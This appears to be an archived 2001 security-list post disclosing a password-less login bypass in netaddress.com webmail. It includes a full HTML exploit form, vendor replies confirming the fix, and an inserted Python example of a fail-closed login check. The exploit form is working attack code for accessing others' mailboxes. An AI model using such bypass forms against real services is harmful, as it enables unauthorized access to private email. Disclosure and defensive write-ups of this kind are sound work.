Netaddress Security issue solved

From: syed mohamed (syedblrat_private)
Date: Thu Aug 02 2001 - 11:32:36 PDT


    Hi,
    
    Vulnerable
    ==========
    netaddress.com mailing service
    
    This mail is a continuation of the previous mails I sent regarding a security 
    flaw in netaddress.com, which will open anybody's mailbox without a password.
    
    I got a mail with an attached HTML page, which is nothing but a saved HTML home 
    page of netaddress.com (the old one). It's the old home page design. When I submit the 
    form without a password it opened the mailbox. Yes, it opens every mailbox 
    without a password. All you need is a valid netaddress ID.
    
    Problem:
    
    When submitting the login form to /tpl/Door/Login, it needs only three 
    parameters: maidid, domainid (value=4), domain (value=usa.net). Create an HTML 
    file which contains all three parameters. Submit the form to 
    http://netaddress.com//tpl/door/login . Note that you must give a double slash after 
    netaddress.com. When I tried with a single slash it didn't work.
    
    Here is the exploit code (save this as HTML and run it locally. Submit only 
    with the userid)
    
    Exploit Code:
    
    <html>
    <form name="loginform"
                  action="http://classic.netaddress.com//tpl/Door/LoginPost" 
    method="POST" target=_blank>
    <input type="hidden" name="LoginState" value="2">
    
                <input type="hidden" name="DomainID" value="4">
                 <input type="hidden" name="Domain" value="usa.net">
    
    
    <b><font color="#FF0000" size="2" face="Arial">Netaddress Security hole - 
    Demo</font></b><font face="Arial" size="2"><br>
    <br>
    Developed By Syed Mohamed (<a 
    href="mailto:syedblrat_private">syedblrat_private</a>)<br>
    <br>
    Just Enter Login ID (enter example if netaddress id is 
    exampleat_private)</font>
    <p>
    
    
    <input type="text" size="16" name="UserID"
                   value="">
    <input type="submit" value="Login">
    </form>
    </p>
    </html>
    
    I have informed usa.net of the issue (I had only the abuse and postmaster IDs of 
    usa.net; the info ID bounced back). Took 3 hrs to solve this issue.
    Now they have solved the issue.
    
    Vendor's response:
    ==================
    First Response:
    ===============
    Thank you for your notification.  We are addressing this issue.
    
    Regards,
    USA.NET, Inc.
    
    Second Response:
    ================
    Dear Sir/Madam,
    
    USA.NET’s technical and security teams have been made aware of this issue
    and it has been corrected.  We appreciate your patience as we strive to
    bring you the most robust email solution possible.
    
    Regards,
    Abuse Dept.
    abuseat_private
    USA.Net, Inc.
    
    
    Third Response:
    ===============
    Yes, this problem has been corrected.
    
    Thank you for your assistance,
    
    USA.NET, Inc.
    
    Thanks to usa.net for responding with great speed.
    
    
    Thanks to my friend Thejaswini who forwarded the old netaddress HTML page.
    
    Regards
    Syed Mohamed
    syedblrat_private
    (Wanna defeat hackers..think like a hacker.. work like a security expert)
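
As an added example (not part of the original post and not USA.NET's code), here is a server-side login check that fails closed on the request described in the message: it canonicalizes the path so the double-slash spelling gets the same policy as the single-slash one, and it refuses any submission that lacks a credential field. The `Password` field name, the case-insensitive route match, the account store and the PBKDF2 hashing are assumptions made for illustration.

```python
import hashlib
import hmac
import posixpath
import re

LOGIN_PATH = "/tpl/door/loginpost"   # route from the posted form, lower-cased (assumed case-insensitive)
REQUIRED = ("UserID", "Domain", "DomainID", "Password")  # "Password" is an assumed field name


def hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


# Constructed account store: (UserID, Domain) -> (salt, password hash)
_SALT = b"constructed-salt"
USERS = {("example", "usa.net"): (_SALT, hash_password("correct horse", _SALT))}


def canonical_path(raw_path: str) -> str:
    """Collapse repeated slashes and dot segments so every spelling of a
    route reaches the same authentication policy."""
    collapsed = re.sub(r"/+", "/", raw_path)   # normpath alone keeps a leading "//"
    return posixpath.normpath(collapsed).lower()


def authenticate(raw_path: str, form: dict) -> bool:
    """Return True only when every credential field is present and the
    password verifies. Everything else fails closed."""
    if canonical_path(raw_path) != LOGIN_PATH:
        return False
    if any(not form.get(name) for name in REQUIRED):
        return False                 # missing or empty field, e.g. no password at all
    record = USERS.get((form["UserID"], form["Domain"]))
    # Hash even for unknown users so the response time does not reveal valid IDs.
    salt, expected = record if record else (_SALT, b"\x00" * 32)
    supplied = hash_password(form["Password"], salt)
    return hmac.compare_digest(supplied, expected) and record is not None
```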
    
    
    



    This archive was generated by hypermail 2b30 : Thu Aug 02 2001 - 11:47:03 PDT